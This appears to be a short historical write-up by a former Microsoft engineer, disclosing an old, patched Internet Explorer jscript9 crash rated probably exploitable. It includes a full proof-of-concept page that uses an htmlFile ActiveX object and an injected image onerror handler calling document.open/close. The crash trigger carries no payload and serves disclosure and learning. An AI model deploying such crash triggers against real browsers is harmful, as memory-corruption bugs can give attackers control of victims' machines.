Creating an htmlFile ActiveX object, refreshing its document, and then triggering a document.open(); document.close() pair via an injected image error handler inside a setTimeout caused a crash rated as PROBABLY_EXPLOITABLE in jscript9!CScriptBody::CScriptBody.

<script>
var axDoc;

function main()
{
    axDoc = new ActiveXObject("htmlFile");
    axDoc.execCommand("Refresh"); // Refreshing is essential.
    setTimeout("writeAxDoc()", 500);
}
function writeAxDoc()
{
    var myDiv = axDoc.createElement("div");
    myDiv.innerHTML = '<img src=1 onerror="setTimeout(\'document.open();document.close()\')">';
}
</script>
<input type="button" onclick="main()" value="CrashMe" />

The fault landed in jscript9!CScriptBody::CScriptBody — a null pointer read where the faulting address was later used as the target of a branch, indicating potential code-flow control. A simpler variation using setTimeout("document.write(1);alert(2)",2000) directly in the htmlFile also demonstrated the timing dependency.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.